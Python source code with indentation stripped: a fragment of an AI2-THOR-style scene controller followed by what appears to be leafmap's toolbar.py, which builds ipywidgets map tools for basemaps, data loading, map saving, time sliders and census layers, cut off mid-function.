seen_target_objects[obj['objectId']].append(dict(
distance=obj['distance'],
agent=event.metadata['agent']))
return seen_target_objects
def initialize_scene(self):
self.target_objects = []
self.object_receptacle = defaultdict(
lambda: dict(objectId='StartupPosition', pivotSimObjs=[]))
self.open_receptacles = []
open_pickupable = {}
pickupable = {}
is_open = {}
for obj in filter(lambda x: x['receptacle'], self.last_event.metadata['objects']):
for oid in obj['receptacleObjectIds']:
self.object_receptacle[oid] = obj
is_open[obj['objectId']] = (obj['openable'] and obj['isopen'])
for obj in filter(lambda x: x['receptacle'], self.last_event.metadata['objects']):
for oid in obj['receptacleObjectIds']:
if obj['openable'] or (obj['objectId'] in self.object_receptacle and self.object_receptacle[obj['objectId']]['openable']):
open_pickupable[oid] = obj['objectId']
else:
pickupable[oid] = obj['objectId']
if open_pickupable.keys():
self.target_objects = random.sample(open_pickupable.keys(), k=1)
shuffled_keys = list(open_pickupable.keys())
random.shuffle(shuffled_keys)
for oid in shuffled_keys:
position_target = self.object_receptacle[self.target_objects[0]]['position']
position_candidate = self.object_receptacle[oid]['position']
dist = math.sqrt(
(position_target['x'] - position_candidate['x']) ** 2 +
(position_target['y'] - position_candidate['y']) ** 2)
# try to find something that is far to avoid having the doors collide
if dist > 1.25:
self.target_objects.append(oid)
break
for roid in set(map(lambda x: open_pickupable[x], self.target_objects)):
if roid in is_open:
continue
self.open_receptacles.append(roid)
self.step(dict(
action='OpenObject',
objectId=roid,
forceVisible=True), raise_for_failure=True)
def queue_step(self):
search_point = self.queue.popleft()
event = self.step(dict(
action='Teleport',
x=search_point.start_position['x'],
y=search_point.start_position['y'],
z=search_point.start_position['z']))
assert event.metadata['lastActionSuccess']
move_vec = search_point.move_vector
move_vec['moveMagnitude'] = self.grid_size
event = self.step(dict(action='Move', **move_vec))
if event.metadata['lastActionSuccess']:
if event.metadata['agent']['position']['y'] > 1.3:
#pprint(search_point.start_position)
#pprint(search_point.move_vector)
#pprint(event.metadata['agent']['position'])
raise Exception("**** got big point ")
self.enqueue_points(event.metadata['agent']['position'])
if not any(map(lambda p: distance(p, event.metadata['agent']['position']) < self.distance_threshold, self.grid_points)):
self.grid_points.append(event.metadata['agent']['position'])
return event
|
toolbar.py
|
"""Module for dealing with the toolbar.
"""
import math
import os
import ipyevents
import ipyleaflet
import ipywidgets as widgets
from ipyfilechooser import FileChooser
from .common import *
def tool_template(m=None):
"""Generates a tool GUI template using ipywidgets.
Args:
m (leafmap.Map, optional): The leaflet Map object. Defaults to None.
Returns:
ipywidgets: The tool GUI widget.
"""
widget_width = "250px"
padding = "0px 0px 0px 5px" # upper, right, bottom, left
style = {"description_width": "initial"}
toolbar_button = widgets.ToggleButton(
value=False,
tooltip="Toolbar",
icon="gear",
layout=widgets.Layout(width="28px", height="28px", padding="0px 0px 0px 4px"),
)
close_button = widgets.ToggleButton(
value=False,
tooltip="Close the tool",
icon="times",
button_style="primary",
layout=widgets.Layout(height="28px", width="28px", padding="0px 0px 0px 4px"),
)
checkbox = widgets.Checkbox(
description="Checkbox",
indent=False,
layout=widgets.Layout(padding=padding, width=widget_width),
)
dropdown = widgets.Dropdown(
options=["Option 1", "Option 2", "Option 3"],
value=None,
description="Dropdown:",
layout=widgets.Layout(width=widget_width, padding=padding),
style=style,
)
int_slider = widgets.IntSlider(
min=1,
max=100,
description="Int Slider: ",
readout=False,
continuous_update=True,
layout=widgets.Layout(width="220px", padding=padding),
style=style,
)
int_slider_label = widgets.Label()
widgets.jslink((int_slider, "value"), (int_slider_label, "value"))
float_slider = widgets.FloatSlider(
min=1,
max=100,
description="Float Slider: ",
readout=False,
continuous_update=True,
layout=widgets.Layout(width="220px", padding=padding),
style=style,
)
float_slider_label = widgets.Label()
widgets.jslink((float_slider, "value"), (float_slider_label, "value"))
color = widgets.ColorPicker(
concise=False,
description="Color:",
value="white",
style=style,
layout=widgets.Layout(width=widget_width, padding=padding),
)
text = widgets.Text(
value="",
description="Textbox:",
placeholder="Placeholder",
style=style,
layout=widgets.Layout(width=widget_width, padding=padding),
)
textarea = widgets.Textarea(
placeholder="Placeholder",
layout=widgets.Layout(width=widget_width),
)
buttons = widgets.ToggleButtons(
value=None,
options=["Apply", "Reset", "Close"],
tooltips=["Apply", "Reset", "Close"],
button_style="primary",
)
buttons.style.button_width = "80px"
output = widgets.Output(layout=widgets.Layout(width=widget_width, padding=padding))
toolbar_widget = widgets.VBox()
toolbar_widget.children = [toolbar_button]
toolbar_header = widgets.HBox()
toolbar_header.children = [close_button, toolbar_button]
toolbar_footer = widgets.VBox()
toolbar_footer.children = [
checkbox,
widgets.HBox([int_slider, int_slider_label]),
widgets.HBox([float_slider, float_slider_label]),
dropdown,
text,
color,
textarea,
buttons,
output,
]
toolbar_event = ipyevents.Event(
source=toolbar_widget, watched_events=["mouseenter", "mouseleave"]
)
def handle_toolbar_event(event):
if event["type"] == "mouseenter":
toolbar_widget.children = [toolbar_header, toolbar_footer]
elif event["type"] == "mouseleave":
if not toolbar_button.value:
toolbar_widget.children = [toolbar_button]
toolbar_button.value = False
close_button.value = False
toolbar_event.on_dom_event(handle_toolbar_event)
def toolbar_btn_click(change):
if change["new"]:
close_button.value = False
toolbar_widget.children = [toolbar_header, toolbar_footer]
else:
if not close_button.value:
toolbar_widget.children = [toolbar_button]
toolbar_button.observe(toolbar_btn_click, "value")
def close_btn_click(change):
if change["new"]:
toolbar_button.value = False
if m is not None:
m.toolbar_reset()
if m.tool_control is not None and m.tool_control in m.controls:
m.remove_control(m.tool_control)
m.tool_control = None
toolbar_widget.close()
close_button.observe(close_btn_click, "value")
def button_clicked(change):
if change["new"] == "Apply":
with output:
output.clear_output()
print("Running ...")
elif change["new"] == "Reset":
textarea.value = ""
output.clear_output()
elif change["new"] == "Close":
if m is not None:
m.toolbar_reset()
if m.tool_control is not None and m.tool_control in m.controls:
m.remove_control(m.tool_control)
m.tool_control = None
toolbar_widget.close()
buttons.value = None
buttons.observe(button_clicked, "value")
toolbar_button.value = True
if m is not None:
toolbar_control = ipyleaflet.WidgetControl(
widget=toolbar_widget, position="topright"
)
if toolbar_control not in m.controls:
m.add_control(toolbar_control)
m.tool_control = toolbar_control
else:
return toolbar_widget
def main_toolbar(m):
"""Creates the main toolbar and adds it to the map.
Args:
m (leafmap.Map): The leafmap Map object.
"""
tools = {
"map": {
"name": "basemap",
"tooltip": "Change basemap",
},
"globe": {
"name": "split_map",
"tooltip": "Split-panel map",
},
"adjust": {
"name": "planet",
"tooltip": "Planet imagery",
},
"folder-open": {
"name": "open_data",
"tooltip": "Open local vector/raster data",
},
"gears": {
"name": "whitebox",
"tooltip": "WhiteboxTools for local geoprocessing",
},
"fast-forward": {
"name": "timeslider",
"tooltip": "Activate the time slider",
},
"eraser": {
"name": "eraser",
"tooltip": "Remove all drawn features",
},
"camera": {
"name": "save_map",
"tooltip": "Save map as HTML or image",
},
"address-book": {
"name": "census",
"tooltip": "Get US Census data",
},
"info": {
"name": "inspector",
"tooltip": "Get COG/STAC pixel value",
},
"search": {
"name": "search_xyz",
"tooltip": "Search XYZ tile services",
},
"download": {
"name": "download_osm",
"tooltip": "Download OSM data",
},
"smile-o": {
"name": "placeholder",
"tooltip": "This is a placeholder",
},
"spinner": {
"name": "placeholder2",
"tooltip": "This is a placeholder",
},
"question": {
"name": "help",
"tooltip": "Get help",
},
}
# if m.sandbox_path is None and (os.environ.get("USE_VOILA") is not None):
# voila_tools = ["camera", "folder-open", "gears"]
# for item in voila_tools:
# if item in tools.keys():
# del tools[item]
icons = list(tools.keys())
tooltips = [item["tooltip"] for item in list(tools.values())]
icon_width = "32px"
icon_height = "32px"
n_cols = 3
n_rows = math.ceil(len(icons) / n_cols)
toolbar_grid = widgets.GridBox(
children=[
widgets.ToggleButton(
layout=widgets.Layout(
width="auto", height="auto", padding="0px 0px 0px 4px"
),
button_style="primary",
icon=icons[i],
tooltip=tooltips[i],
)
for i in range(len(icons))
],
layout=widgets.Layout(
width="109px",
grid_template_columns=(icon_width + " ") * n_cols,
grid_template_rows=(icon_height + " ") * n_rows,
grid_gap="1px 1px",
padding="5px",
),
)
m.toolbar = toolbar_grid
def tool_callback(change):
if change["new"]:
current_tool = change["owner"]
for tool in toolbar_grid.children:
if tool is not current_tool:
tool.value = False
tool = change["owner"]
tool_name = tools[tool.icon]["name"]
if tool_name == "basemap":
change_basemap(m)
if tool_name == "split_map":
split_basemaps(m)
if tool_name == "planet":
split_basemaps(m, layers_dict=planet_tiles())
elif tool_name == "open_data":
open_data_widget(m)
elif tool_name == "eraser":
if m.draw_control is not None:
m.draw_control.clear()
m.user_roi = None
m.user_rois = None
m.draw_features = []
elif tool_name == "whitebox":
import whiteboxgui.whiteboxgui as wbt
tools_dict = wbt.get_wbt_dict()
wbt_toolbox = wbt.build_toolbox(
tools_dict,
max_width="800px",
max_height="500px",
sandbox_path=m.sandbox_path,
)
wbt_control = ipyleaflet.WidgetControl(
widget=wbt_toolbox, position="bottomright"
)
m.whitebox = wbt_control
m.add_control(wbt_control)
elif tool_name == "timeslider":
m.add_time_slider()
elif tool_name == "save_map":
save_map((m))
elif tool_name == "census":
census_widget(m)
elif tool_name == "inspector":
inspector_gui(m)
elif tool_name == "search_xyz":
search_basemaps(m)
elif tool_name == "download_osm":
download_osm(m)
elif tool_name == "help":
import webbrowser
webbrowser.open_new_tab("https://leafmap.org")
current_tool.value = False
else:
# tool = change["owner"]
# tool_name = tools[tool.icon]["name"]
pass
m.toolbar_reset()
for tool in toolbar_grid.children:
tool.observe(tool_callback, "value")
toolbar_button = widgets.ToggleButton(
value=False,
tooltip="Toolbar",
icon="wrench",
layout=widgets.Layout(width="28px", height="28px", padding="0px 0px 0px 4px"),
)
m.toolbar_button = toolbar_button
layers_button = widgets.ToggleButton(
value=False,
tooltip="Layers",
icon="server",
layout=widgets.Layout(height="28px", width="72px"),
)
toolbar_widget = widgets.VBox()
toolbar_widget.children = [toolbar_button]
toolbar_header = widgets.HBox()
toolbar_header.children = [layers_button, toolbar_button]
toolbar_footer = widgets.VBox()
toolbar_footer.children = [toolbar_grid]
toolbar_event = ipyevents.Event(
source=toolbar_widget, watched_events=["mouseenter", "mouseleave"]
)
def handle_toolbar_event(event):
if event["type"] == "mouseenter":
toolbar_widget.children = [toolbar_header, toolbar_footer]
elif event["type"] == "mouseleave":
if not toolbar_button.value:
toolbar_widget.children = [toolbar_button]
toolbar_button.value = False
layers_button.value = False
toolbar_event.on_dom_event(handle_toolbar_event)
def toolbar_btn_click(change):
if change["new"]:
layers_button.value = False
toolbar_widget.children = [toolbar_header, toolbar_footer]
else:
if not layers_button.value:
toolbar_widget.children = [toolbar_button]
toolbar_button.observe(toolbar_btn_click, "value")
def layers_btn_click(change):
if change["new"]:
layers_hbox = []
all_layers_chk = widgets.Checkbox(
value=False,
description="All layers on/off",
indent=False,
layout=widgets.Layout(height="18px", padding="0px 8px 25px 8px"),
)
all_layers_chk.layout.width = "30ex"
layers_hbox.append(all_layers_chk)
def all_layers_chk_changed(change):
if change["new"]:
for layer in m.layers:
layer.visible = True
else:
for layer in m.layers:
layer.visible = False
all_layers_chk.observe(all_layers_chk_changed, "value")
layers = [
lyr
for lyr in m.layers
if (
isinstance(lyr, ipyleaflet.TileLayer)
or isinstance(lyr, ipyleaflet.WMSLayer)
)
]
# if the layers contain unsupported layers (e.g., GeoJSON, GeoData), adds the ipyleaflet built-in LayerControl
if len(layers) < (len(m.layers) - 1):
if m.layer_control is None:
layer_control = ipyleaflet.LayersControl(position="topright")
m.layer_control = layer_control
if m.layer_control not in m.controls:
m.add_control(m.layer_control)
# for non-TileLayer, use layer.style={'opacity':0, 'fillOpacity': 0} to turn layer off.
for layer in layers:
layer_chk = widgets.Checkbox(
value=layer.visible,
description=layer.name,
indent=False,
layout=widgets.Layout(height="18px"),
)
layer_chk.layout.width = "25ex"
layer_opacity = widgets.FloatSlider(
value=layer.opacity,
min=0,
max=1,
step=0.01,
readout=False,
layout=widgets.Layout(width="80px"),
)
layer_settings = widgets.ToggleButton(
icon="gear",
tooltip=layer.name,
layout=widgets.Layout(
width="25px", height="25px", padding="0px 0px 0px 5px"
),
)
# def layer_vis_on_click(change):
# if change["new"]:
# layer_name = change["owner"].tooltip
# change["owner"].value = False
# layer_settings.observe(layer_vis_on_click, "value")
# def layer_chk_changed(change):
# layer_name = change["owner"].description
# layer_chk.observe(layer_chk_changed, "value")
widgets.jslink((layer_chk, "value"), (layer, "visible"))
widgets.jsdlink((layer_opacity, "value"), (layer, "opacity"))
hbox = widgets.HBox(
[layer_chk, layer_settings, layer_opacity],
layout=widgets.Layout(padding="0px 8px 0px 8px"),
)
layers_hbox.append(hbox)
toolbar_footer.children = layers_hbox
toolbar_button.value = False
else:
toolbar_footer.children = [toolbar_grid]
layers_button.observe(layers_btn_click, "value")
toolbar_control = ipyleaflet.WidgetControl(
widget=toolbar_widget, position="topright"
)
m.add_control(toolbar_control)
def open_data_widget(m):
"""A widget for opening local vector/raster data.
Args:
m (object): leafmap.Map
"""
padding = "0px 0px 0px 5px"
style = {"description_width": "initial"}
file_type = widgets.ToggleButtons(
options=["Shapefile", "GeoJSON", "CSV", "Vector", "Raster"],
tooltips=[
"Open a shapefile",
"Open a GeoJSON file",
"Open a vector dataset",
"Create points from CSV",
"Open a vector dataset",
"Open a raster dataset",
],
)
file_type.style.button_width = "88px"
filepath = widgets.Text(
value="",
description="File path or http URL:",
tooltip="Enter a file path or http URL to vector data",
style=style,
layout=widgets.Layout(width="454px", padding=padding),
)
http_widget = widgets.HBox()
file_chooser = FileChooser(
os.getcwd(), sandbox_path=m.sandbox_path, layout=widgets.Layout(width="454px")
)
file_chooser.filter_pattern = "*.shp"
file_chooser.use_dir_icons = True
layer_name = widgets.Text(
value="Shapefile",
description="Enter a layer name:",
tooltip="Enter a layer name for the selected file",
style=style,
layout=widgets.Layout(width="454px", padding=padding),
)
longitude = widgets.Dropdown(
options=[],
value=None,
description="Longitude:",
layout=widgets.Layout(width="149px", padding=padding),
style=style,
)
latitude = widgets.Dropdown(
options=[],
value=None,
description="Latitude:",
layout=widgets.Layout(width="149px", padding=padding),
style=style,
)
label = widgets.Dropdown(
options=[],
value=None,
description="Label:",
layout=widgets.Layout(width="149px", padding=padding),
style=style,
)
point_check = widgets.Checkbox(
description="Is it a point layer?",
indent=False,
layout=widgets.Layout(padding=padding, width="150px"),
style=style,
)
point_popup = widgets.SelectMultiple(
options=[
"None",
],
value=["None"],
description="Popup attributes:",
disabled=False,
style=style,
)
csv_widget = widgets.HBox()
point_widget = widgets.HBox()
def point_layer_check(change):
if point_check.value:
if filepath.value.strip() != "":
m.default_style = {"cursor": "wait"}
point_popup.options = vector_col_names(filepath.value)
point_popup.value = [point_popup.options[0]]
point_widget.children = [point_check, point_popup]
else:
point_widget.children = [point_check]
point_check.observe(point_layer_check)
ok_cancel = widgets.ToggleButtons(
value=None,
options=["Apply", "Reset", "Close"],
tooltips=["Apply", "Reset", "Close"],
button_style="primary",
)
# ok_cancel.style.button_width = "50px"
bands = widgets.Text(
value=None,
description="Band:",
tooltip="Enter a list of band indices",
style=style,
layout=widgets.Layout(width="150px", padding=padding),
)
vmin = widgets.Text(
value=None,
description="vmin:",
tooltip="Minimum value of the raster to visualize",
style=style,
layout=widgets.Layout(width="148px"),
)
vmax = widgets.Text(
value=None,
description="vmax:",
tooltip="Maximum value of the raster to visualize",
style=style,
layout=widgets.Layout(width="148px"),
)
nodata = widgets.Text(
value=None,
description="Nodata:",
tooltip="Nodata the raster to visualize",
style=style,
layout=widgets.Layout(width="150px", padding=padding),
)
palette = widgets.Dropdown(
options=[],
value=None,
description="palette:",
layout=widgets.Layout(width="300px"),
style=style,
)
raster_options = widgets.VBox()
def filepath_change(change):
if file_type.value == "Raster":
pass
# if (
# filepath.value.startswith("http")
# or filepath.value.endswith(".txt")
# or filepath.value.endswith(".csv")
# ):
# bands.disabled = True
# palette.disabled = False
# # x_dim.disabled = True
# # y_dim.disabled = True
# else:
# bands.disabled = False
# palette.disabled = False
# # x_dim.disabled = True
# # y_dim.disabled = True
filepath.observe(filepath_change, "value")
tool_output = widgets.Output(
layout=widgets.Layout(max_height="150px", max_width="500px", overflow="auto")
)
main_widget = widgets.VBox(
[
file_type,
file_chooser,
http_widget,
csv_widget,
layer_name,
point_widget,
raster_options,
ok_cancel,
tool_output,
]
)
tool_output_ctrl = ipyleaflet.WidgetControl(widget=main_widget, position="topright")
if m.tool_output_ctrl is not None and m.tool_output_ctrl in m.controls:
m.remove_control(m.tool_output_ctrl)
def bands_changed(change):
if change["new"] and "," in change["owner"].value:
palette.value = None
palette.disabled = True
else:
palette.disabled = False
bands.observe(bands_changed, "value")
def chooser_callback(chooser):
filepath.value = file_chooser.selected
if file_type.value == "CSV":
import pandas as pd
df = pd.read_csv(filepath.value)
col_names = df.columns.values.tolist()
longitude.options = col_names
latitude.options = col_names
label.options = col_names
if "longitude" in col_names:
longitude.value = "longitude"
if "latitude" in col_names:
latitude.value = "latitude"
if "name" in col_names:
label.value = "name"
file_chooser.register_callback(chooser_callback)
def file_type_changed(change):
ok_cancel.value = None
file_chooser.default_path = os.getcwd()
file_chooser.reset()
layer_name.value = file_type.value
csv_widget.children = []
filepath.value = ""
tool_output.clear_output()
if change["new"] == "Shapefile":
file_chooser.filter_pattern = "*.shp"
raster_options.children = []
point_widget.children = []
point_check.value = False
http_widget.children = []
elif change["new"] == "GeoJSON":
file_chooser.filter_pattern = ["*.geojson", "*.json"]
raster_options.children = []
point_widget.children = []
point_check.value = False
http_widget.children = [filepath]
elif change["new"] == "Vector":
file_chooser.filter_pattern = "*.*"
raster_options.children = []
point_widget.children = [point_check]
point_check.value = False
http_widget.children = [filepath]
elif change["new"] == "CSV":
file_chooser.filter_pattern = ["*.csv", "*.CSV"]
csv_widget.children = [longitude, latitude, label]
raster_options.children = []
point_widget.children = []
point_check.value = False
http_widget.children = [filepath]
elif change["new"] == "Raster":
file_chooser.filter_pattern = ["*.tif", "*.img"]
palette.options = get_palettable(types=["matplotlib", "cartocolors"])
palette.value = None
raster_options.children = [
widgets.HBox([bands, vmin, vmax]),
widgets.HBox([nodata, palette]),
]
point_widget.children = []
point_check.value = False
http_widget.children = [filepath]
def ok_cancel_clicked(change):
if change["new"] == "Apply":
m.default_style = {"cursor": "wait"}
file_path = filepath.value
with tool_output:
tool_output.clear_output()
if file_path.strip() != "":
ext = os.path.splitext(file_path)[1]
if point_check.value:
popup = list(point_popup.value)
if len(popup) == 1:
popup = popup[0]
m.add_point_layer(
file_path,
popup=popup,
layer_name=layer_name.value,
)
elif ext.lower() == ".shp":
m.add_shp(file_path, style={}, layer_name=layer_name.value)
elif ext.lower() == ".geojson":
m.add_geojson(file_path, style={}, layer_name=layer_name.value)
elif ext.lower() == ".csv" and file_type.value == "CSV":
m.add_xy_data(
file_path,
x=longitude.value,
y=latitude.value,
label=label.value,
layer_name=layer_name.value,
)
elif (
ext.lower() in [".tif", "img"]
) and file_type.value == "Raster":
band = None
vis_min = None
vis_max = None
vis_nodata = None
try:
if len(bands.value) > 0:
band = int(bands.value)
if len(vmin.value) > 0:
vis_min = float(vmin.value)
if len(vmax.value) > 0:
vis_max = float(vmax.value)
if len(nodata.value) > 0:
vis_nodata = float(nodata.value)
except:
pass
m.add_local_tile(
file_path,
layer_name=layer_name.value,
band=band,
palette=palette.value,
vmin=vis_min,
vmax=vis_max,
nodata=vis_nodata,
)
else:
print("Please select a file to open.")
m.toolbar_reset()
m.default_style = {"cursor": "default"}
elif change["new"] == "Reset":
file_chooser.reset()
tool_output.clear_output()
filepath.value = ""
m.toolbar_reset()
elif change["new"] == "Close":
if m.tool_output_ctrl is not None and m.tool_output_ctrl in m.controls:
m.remove_control(m.tool_output_ctrl)
m.tool_output_ctrl = None
m.toolbar_reset()
ok_cancel.value = None
file_type.observe(file_type_changed, names="value")
ok_cancel.observe(ok_cancel_clicked, names="value")
# file_chooser.register_callback(chooser_callback)
m.add_control(tool_output_ctrl)
m.tool_output_ctrl = tool_output_ctrl
def change_basemap(m):
"""Widget for changing basemaps.
Args:
m (object): leafmap.Map.
"""
from .basemaps import get_xyz_dict
from .leafmap import leafmap_basemaps
xyz_dict = get_xyz_dict()
layers = list(m.layers)
if len(layers) == 1:
layers = [layers[0]] + [leafmap_basemaps["OpenStreetMap"]]
elif len(layers) > 1 and (layers[1].name != "OpenStreetMap"):
layers = [layers[0]] + [leafmap_basemaps["OpenStreetMap"]] + layers[1:]
m.layers = layers
value = "OpenStreetMap"
dropdown = widgets.Dropdown(
options=list(leafmap_basemaps.keys()),
value=value,
layout=widgets.Layout(width="200px"),
)
close_btn = widgets.Button(
icon="times",
tooltip="Close the basemap widget",
button_style="primary",
layout=widgets.Layout(width="32px"),
)
basemap_widget = widgets.HBox([dropdown, close_btn])
def on_click(change):
basemap_name = change["new"]
old_basemap = m.layers[1]
m.substitute_layer(old_basemap, leafmap_basemaps[basemap_name])
if basemap_name in xyz_dict:
if "bounds" in xyz_dict[basemap_name]:
bounds = xyz_dict[basemap_name]["bounds"]
bounds = [bounds[0][1], bounds[0][0], bounds[1][1], bounds[1][0]]
m.zoom_to_bounds(bounds)
dropdown.observe(on_click, "value")
def close_click(change):
m.toolbar_reset()
if m.basemap_ctrl is not None and m.basemap_ctrl in m.controls:
m.remove_control(m.basemap_ctrl)
basemap_widget.close()
close_btn.on_click(close_click)
basemap_control = ipyleaflet.WidgetControl(
widget=basemap_widget, position="topright"
)
m.add_control(basemap_control)
m.basemap_ctrl = basemap_control
def save_map(m):
"""Saves the map as HTML, JPG, or PNG.
Args:
m (leafmap.Map): The leafmap Map object.
"""
import time
tool_output = widgets.Output()
m.tool_output = tool_output
tool_output.clear_output(wait=True)
save_map_widget = widgets.VBox()
save_type = widgets.ToggleButtons(
options=["HTML", "PNG", "JPG"],
tooltips=[
"Save the map as an HTML file",
"Take a screenshot and save as a PNG file",
"Take a screenshot and save as a JPG file",
],
)
file_chooser = FileChooser(
os.getcwd(), sandbox_path=m.sandbox_path, layout=widgets.Layout(width="454px")
)
file_chooser.default_filename = "my_map.html"
file_chooser.use_dir_icons = True
ok_cancel = widgets.ToggleButtons(
value=None,
options=["OK", "Cancel", "Close"],
tooltips=["OK", "Cancel", "Close"],
button_style="primary",
)
def save_type_changed(change):
ok_cancel.value = None
# file_chooser.reset()
file_chooser.default_path = os.getcwd()
if change["new"] == "HTML":
file_chooser.default_filename = "my_map.html"
elif change["new"] == "PNG":
file_chooser.default_filename = "my_map.png"
elif change["new"] == "JPG":
file_chooser.default_filename = "my_map.jpg"
save_map_widget.children = [save_type, file_chooser]
def chooser_callback(chooser):
save_map_widget.children = [save_type, file_chooser, ok_cancel]
def ok_cancel_clicked(change):
if change["new"] == "OK":
file_path = file_chooser.selected
ext = os.path.splitext(file_path)[1]
if save_type.value == "HTML" and ext.upper() == ".HTML":
tool_output.clear_output()
m.to_html(file_path)
elif save_type.value == "PNG" and ext.upper() == ".PNG":
tool_output.clear_output()
m.toolbar_button.value = False
if m.save_map_control is not None:
m.remove_control(m.save_map_control)
m.save_map_control = None
time.sleep(2)
screen_capture(outfile=file_path)
elif save_type.value == "JPG" and ext.upper() == ".JPG":
tool_output.clear_output()
m.toolbar_button.value = False
if m.save_map_control is not None:
m.remove_control(m.save_map_control)
m.save_map_control = None
time.sleep(2)
screen_capture(outfile=file_path)
else:
label = widgets.Label(
value="The selected file extension does not match the selected exporting type."
)
save_map_widget.children = [save_type, file_chooser, label]
elif change["new"] == "Cancel":
tool_output.clear_output()
file_chooser.reset()
elif change["new"] == "Close":
if m.save_map_control is not None:
m.remove_control(m.save_map_control)
m.save_map_control = None
ok_cancel.value = None
m.toolbar_reset()
save_type.observe(save_type_changed, names="value")
ok_cancel.observe(ok_cancel_clicked, names="value")
file_chooser.register_callback(chooser_callback)
save_map_widget.children = [save_type, file_chooser]
save_map_control = ipyleaflet.WidgetControl(
widget=save_map_widget, position="topright"
)
m.add_control(save_map_control)
m.save_map_control = save_map_control
def split_basemaps(
m, layers_dict=None, left_name=None, right_name=None, width="120px", **kwargs
):
"""Create a split-panel map for visualizing two maps.
Args:
m (ipyleaflet.Map): An ipyleaflet map object.
layers_dict (dict, optional): A dictionary of TileLayers. Defaults to None.
left_name (str, optional): The default value of the left dropdown list. Defaults to None.
right_name (str, optional): The default value of the right dropdown list. Defaults to None.
width (str, optional): The width of the dropdown list. Defaults to "120px".
"""
from .leafmap import leafmap_basemaps
controls = m.controls
layers = m.layers
# m.layers = [m.layers[0]]
m.clear_controls()
add_zoom = True
add_fullscreen = True
if layers_dict is None:
layers_dict = {}
keys = dict(leafmap_basemaps).keys()
for key in keys:
if isinstance(leafmap_basemaps[key], ipyleaflet.WMSLayer):
pass
else:
layers_dict[key] = leafmap_basemaps[key]
keys = list(layers_dict.keys())
if left_name is None:
left_name = keys[0]
if right_name is None:
right_name = keys[-1]
left_layer = layers_dict[left_name]
right_layer = layers_dict[right_name]
control = ipyleaflet.SplitMapControl(left_layer=left_layer, right_layer=right_layer)
m.add_control(control)
left_dropdown = widgets.Dropdown(
options=keys, value=left_name, layout=widgets.Layout(width=width)
)
left_control = ipyleaflet.WidgetControl(widget=left_dropdown, position="topleft")
m.add_control(left_control)
right_dropdown = widgets.Dropdown(
options=keys, value=right_name, layout=widgets.Layout(width=width)
)
right_control = ipyleaflet.WidgetControl(widget=right_dropdown, position="topright")
m.add_control(right_control)
close_button = widgets.ToggleButton(
value=False,
tooltip="Close the tool",
icon="times",
# button_style="primary",
layout=widgets.Layout(height="28px", width="28px", padding="0px 0px 0px 4px"),
)
def close_btn_click(change):
if change["new"]:
m.controls = controls
m.clear_layers()
m.layers = layers
close_button.observe(close_btn_click, "value")
close_control = ipyleaflet.WidgetControl(
widget=close_button, position="bottomright"
)
m.add_control(close_control)
if add_zoom:
m.add_control(ipyleaflet.ZoomControl())
if add_fullscreen:
m.add_control(ipyleaflet.FullScreenControl())
m.add_control(ipyleaflet.ScaleControl(position="bottomleft"))
split_control = None
for ctrl in m.controls:
if isinstance(ctrl, ipyleaflet.SplitMapControl):
split_control = ctrl
break
def left_change(change):
split_control.left_layer.url = layers_dict[left_dropdown.value].url
left_dropdown.observe(left_change, "value")
def right_change(change):
split_control.right_layer.url = layers_dict[right_dropdown.value].url
right_dropdown.observe(right_change, "value")
def time_slider(
m,
layers_dict={},
labels=None,
time_interval=1,
position="bottomright",
slider_length="150px",
):
"""Adds a time slider to the map.
Args:
layers_dict (dict, optional): The dictionary containing a set of XYZ tile layers.
labels (list, optional): The list of labels to be used for the time series. Defaults to None.
time_interval (int, optional): Time interval in seconds. Defaults to 1.
position (str, optional): Position to place the time slider, can be any of ['topleft', 'topright', 'bottomleft', 'bottomright']. Defaults to "bottomright".
slider_length (str, optional): Length of the time slider. Defaults to "150px".
"""
import time
import threading
if not isinstance(layers_dict, dict):
raise TypeError("The layers_dict must be a dictionary.")
if len(layers_dict) == 0:
layers_dict = planet_monthly_tiles()
if labels is None:
labels = list(layers_dict.keys())
if len(labels) != len(layers_dict):
raise ValueError("The length of labels is not equal to that of layers_dict.")
slider = widgets.IntSlider(
min=1,
max=len(labels),
readout=False,
continuous_update=False,
layout=widgets.Layout(width=slider_length),
)
label = widgets.Label(
value=labels[0], layout=widgets.Layout(padding="0px 5px 0px 5px")
)
play_btn = widgets.Button(
icon="play",
tooltip="Play the time slider",
button_style="primary",
layout=widgets.Layout(width="32px"),
)
pause_btn = widgets.Button(
icon="pause",
tooltip="Pause the time slider",
button_style="primary",
layout=widgets.Layout(width="32px"),
)
close_btn = widgets.Button(
icon="times",
tooltip="Close the time slider",
button_style="primary",
layout=widgets.Layout(width="32px"),
)
play_chk = widgets.Checkbox(value=False)
slider_widget = widgets.HBox([label, slider, play_btn, pause_btn, close_btn])
def play_click(b):
play_chk.value = True
def work(slider):
while play_chk.value:
if slider.value < len(labels):
slider.value += 1
else:
slider.value = 1
time.sleep(time_interval)
thread = threading.Thread(target=work, args=(slider,))
thread.start()
def pause_click(b):
play_chk.value = False
play_btn.on_click(play_click)
pause_btn.on_click(pause_click)
keys = list(layers_dict.keys())
layer = layers_dict[keys[0]]
m.add_layer(layer)
def slider_changed(change):
m.default_style = {"cursor": "wait"}
index = slider.value - 1
label.value = labels[index]
layer.url = layers_dict[label.value].url
layer.name = layers_dict[label.value].name
m.default_style = {"cursor": "default"}
slider.observe(slider_changed, "value")
def close_click(b):
play_chk.value = False
m.toolbar_reset()
if m.slider_ctrl is not None and m.slider_ctrl in m.controls:
m.remove_control(m.slider_ctrl)
slider_widget.close()
close_btn.on_click(close_click)
slider_ctrl = ipyleaflet.WidgetControl(widget=slider_widget, position=position)
m.add_control(slider_ctrl)
m.slider_ctrl = slider_ctrl
def census_widget(m=None):
"""Widget for adding US Census data.
Args:
m (leafmap.Map, optional): The leaflet Map object. Defaults to None.
Returns:
ipywidgets: The tool GUI widget.
"""
from owslib.wms import WebMapService
census_dict = get_census_dict()
m.add_census_data("Census 2020", "States")
widget_width = "250px"
padding = "0px 0px 0px 5px" # upper, right, bottom, left
style = {"description_width": "initial"}
toolbar_button = widgets.ToggleButton(
value=False,
tooltip="Toolbar",
icon="address-book",
layout=widgets.Layout(width="28px", height="28px", padding="0px 0px 0px 4px"),
)
close_button = widgets.ToggleButton(
value=False,
tooltip="Close the tool",
icon="times",
button_style="primary",
layout=widgets.Layout(height="28px", width="28px", padding="0px 0px 0px 4px"),
)
wms = widgets.Dropdown(
options=census_dict.keys(),
value="Census 2020",
description="WMS:",
layout=widgets.Layout(width=widget_width, padding=padding),
style=style,
)
layer = widgets.Dropdown(
options=census_dict["Census 2020"]["layers"],
value="States",
description="Layer:",
layout=widgets.Layout(width=widget_width, padding=padding),
